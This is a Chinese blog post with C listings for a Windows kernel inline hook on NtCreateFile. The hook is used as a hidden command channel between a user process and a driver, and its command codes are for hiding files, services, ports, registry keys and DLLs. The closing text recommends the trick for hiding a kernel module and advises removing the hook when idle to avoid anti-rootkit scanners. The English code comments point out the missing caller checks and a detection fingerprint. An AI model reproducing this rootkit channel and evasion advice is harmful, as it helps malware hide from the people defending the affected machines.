2010年12月5日 星期日

inline hook NtCreateFile實現ring3和ring0通信


ring0代碼:


/* ring3 <-> ring0 command codes.
 *
 * A ring3 process puts one of these values in the ShareAccess argument of
 * NtCreateFile (CreateFile's dwShareMode, see the ring3 listing below) and
 * NewNtCreateFile treats the call as a message instead of a file open.
 * The same table is duplicated verbatim in the ring3 listing; the two copies
 * must stay in sync (a shared header would make that automatic).
 *
 * Values are arbitrary magic numbers; what matters is that they are unique
 * and do not look like a legitimate share mode.  Note the sequence is not
 * contiguous (0x...89 is followed by 0x...90) -- harmless, but easy to
 * mis-extend. */
#define NO_MSG 0x88882048 /* defined on both sides but never matched by the hook's switch */

#define START_PROTECT 0x88884086

#define START_HIDEFILE 0x88884087 /* the only code the sample ring3 program sends */

#define START_HIDESERVICES 0x88884088

#define START_HIDEPORT 0x88884089

#define START_HIDEKEY 0x88884090

#define START_CHECKHOOK 0x88884091


#define START_PARAKEY   0x88884092

#define START_DLLPATH 0x88884093


#define START_CLEARFILER 0x88884094


#define START_HOOKIOCREATEFILE 0x88884095


#define START_HIDEDLL 0x88884096




/*
 * Sink for a command received through the hooked NtCreateFile.
 *
 * IRPcode  - the START_* code the ring3 caller placed in ShareAccess.
 * buf      - command text copied out of the caller's ObjectName; the hook
 *            passes wcslen(buf) as uInSize, so it is expected to be
 *            NUL-terminated by the caller.
 * uInSize  - length of buf in WCHARs, not bytes.
 *
 * In this listing the body is intentionally empty ("put your code here");
 * the casts only silence unused-parameter warnings.
 */
VOID DispatchIoctl(ULONG IRPcode, WCHAR *buf, ULONG uInSize)
{
	(void)IRPcode;
	(void)buf;
	(void)uInSize;
}


#pragma LOCKEDCODE

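/*
 * Returns TRUE when ShareAccess carries one of the START_* command codes that
 * ring3 smuggles through NtCreateFile (see the #defines above).  NO_MSG is
 * deliberately not a command: the original switch never matched it either.
 */
static BOOL IsCommandCode(ULONG ShareAccess)
{
	switch (ShareAccess) {
	case START_PROTECT:
	case START_HIDEFILE:
	case START_HIDEKEY:
	case START_HIDESERVICES:
	case START_HIDEPORT:
	case START_PARAKEY:
	case START_DLLPATH:
	case START_CLEARFILER:
	case START_CHECKHOOK:
	case START_HOOKIOCREATEFILE:
	case START_HIDEDLL:
		return TRUE;
	default:
		return FALSE;
	}
}

/*
 * Inline-hook replacement for NtCreateFile.
 *
 * If ShareAccess is one of the START_* command codes the call is a
 * ring3->ring0 message: the command text is read from
 * ObjectAttributes->ObjectName, handed to DispatchIoctl(), and 0
 * (STATUS_SUCCESS) is returned without ever reaching the real NtCreateFile.
 * FileHandle and IoStatusBlock are NOT written on that path, so the
 * user-mode caller gets an indeterminate handle back.  Every other call is
 * forwarded unchanged to the original code through NtCreateFileHookZone.
 *
 * Parameters and return value: identical to NtCreateFile.
 *
 * Security notes:
 *  - Every pointer here comes from the user-mode caller.  The original
 *    memcpy'd ObjectName->Length bytes into a 200-byte stack buffer and only
 *    zeroed the first 100 bytes, so a long or unterminated name overflowed
 *    the kernel stack and a NULL ObjectAttributes crashed the machine
 *    (unprivileged local DoS).  This version bounds the copy, always
 *    terminates the buffer and rejects NULL pointers.  It still touches user
 *    memory directly: the kernel rule for a system-call hook is
 *    ProbeForRead() inside __try/__except before dereferencing these
 *    pointers -- not added in this listing, treat it as an open item.
 *  - Nothing authenticates the caller.  Any local process that knows the
 *    magic ShareAccess values can drive every command.
 */
NTSTATUS NewNtCreateFile(OUT PHANDLE FileHandle,
       IN ACCESS_MASK DesiredAccess,
       IN POBJECT_ATTRIBUTES ObjectAttributes,
       OUT PIO_STATUS_BLOCK IoStatusBlock,
       IN PLARGE_INTEGER AllocationSize OPTIONAL,
       IN ULONG FileAttributes,
       IN ULONG ShareAccess,
       IN ULONG CreateDisposition,
       IN ULONG CreateOptions,
       IN PVOID EaBuffer OPTIONAL,
       IN ULONG EaLength)
{
	/* Command text buffer.  The copy below is capped at one WCHAR less than
	 * the array and the whole array is zeroed first, so the last WCHAR is
	 * always a terminator and wcslen() cannot run off the end. */
	WCHAR lpwCommand[100];
	const ULONG maxCommandBytes = sizeof(lpwCommand) - sizeof(WCHAR);
	NTSTATUS status;

	if (IsCommandCode(ShareAccess)) {
		POBJECT_ATTRIBUTES oa = ObjectAttributes;
		ULONG nameBytes;

		RtlZeroMemory(lpwCommand, sizeof(lpwCommand));

		/* Refuse a malformed message instead of faulting on it. */
		if (oa == NULL || oa->ObjectName == NULL || oa->ObjectName->Buffer == NULL) {
			return FALSE;
		}

		/* UNICODE_STRING.Length is a byte count, not a WCHAR count. */
		nameBytes = oa->ObjectName->Length;
		if (nameBytes > maxCommandBytes) {
			/* Does not fit: drop the message rather than dispatch a truncated
			 * command that might name a different object. */
			return FALSE;
		}
		memcpy(lpwCommand, oa->ObjectName->Buffer, nameBytes);

		/* Third argument is the command length in WCHARs, as before. */
		DispatchIoctl(ShareAccess, lpwCommand, (ULONG)wcslen(lpwCommand));

		/* 0 == STATUS_SUCCESS.  FileHandle / IoStatusBlock are left unset. */
		return FALSE;
	}

	/* Not a message: run the original NtCreateFile through the trampoline. */
	OldNtCreateFile = (NtCreateFile)NtCreateFileHookZone;
	status = OldNtCreateFile(FileHandle,
	                         DesiredAccess,
	                         ObjectAttributes,
	                         IoStatusBlock,
	                         AllocationSize,
	                         FileAttributes,
	                         ShareAccess,
	                         CreateDisposition,
	                         CreateOptions,
	                         EaBuffer,
	                         EaLength);
	return status;
}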


////////////////////////////////////////////


ring3代碼就很簡單了:


#include <windows.h>

#include <stdio.h>


/* Command codes sent to the hooked NtCreateFile via CreateFile's dwShareMode.
 * This table is a verbatim copy of the one in the ring0 listing above; if the
 * two ever drift the driver will silently ignore (or misroute) commands, so
 * a shared header is the safer layout. */
#define NO_MSG 0x88882048 /* never recognised by the hook; kept for symmetry */

#define START_PROTECT 0x88884086

#define START_HIDEFILE 0x88884087 /* the code main() below sends */

#define START_HIDESERVICES 0x88884088

#define START_HIDEPORT 0x88884089

#define START_HIDEKEY 0x88884090

#define START_CHECKHOOK 0x88884091

#define START_PARAKEY   0x88884092

#define START_DLLPATH 0x88884093

#define START_CLEARFILER 0x88884094

#define START_HOOKIOCREATEFILE 0x88884095

#define START_HIDEDLL 0x88884096


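/*
 * Ring3 side of the channel: send START_HIDEFILE with argv[1] as the payload.
 *
 * The "message" is an ordinary CreateFile call whose dwShareMode is the
 * START_HIDEFILE magic value; the hooked NtCreateFile recognises that value,
 * reads the path out of the object name and never opens anything.
 *
 * Exit status: 0 once the call has been issued, 1 on a usage error
 * (the original returned TRUE, i.e. a failure status, on success).
 *
 * Caveats that follow from the ring0 listing above:
 *  - The hook returns STATUS_SUCCESS without writing the output handle, so
 *    hFile is NOT a real handle.  It is deliberately neither checked nor
 *    closed: CloseHandle on an indeterminate value could close an unrelated
 *    handle.  Consequently this program cannot tell whether the driver
 *    actually received the command.
 *  - If the driver is not loaded the call reaches the real NtCreateFile with
 *    a share-mode value outside the FILE_SHARE_* bits; expect it to be
 *    rejected as an invalid parameter rather than create the file, but verify
 *    on the target OS before relying on that together with OPEN_ALWAYS.
 */
int main(int argc, char *argv[])
{
	HANDLE hFile;

	if (argc != 2) {
		printf("used:%s lpk.dll\r\n", argv[0]);
		return 1;
	}

	hFile = CreateFile(argv[1], GENERIC_READ, START_HIDEFILE, NULL,
	                   OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	(void)hFile; /* intentionally not closed -- see the note above */
	return 0;
}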


這樣就不需要註冊 Device，在隱藏內核模塊的時候比較方便。不需要通信的時候，記得恢復 inline hook，免得被 ARK 工具掃出來。另外要注意兩點：這條通道沒有任何身份驗證，任何知道這些 ShareAccess 魔數的本機進程都能對驅動下達命令；而且 hook 對這類呼叫直接回傳 0（STATUS_SUCCESS）卻不填 FileHandle，而未掛鉤的 NtCreateFile 對這種非法的 ShareAccess 值應該會回傳錯誤——這個行為差異本身就是一個可以被掃描工具利用的偵測特徵。


還有很多函數可以用,仁者見仁智者見智了~~



 

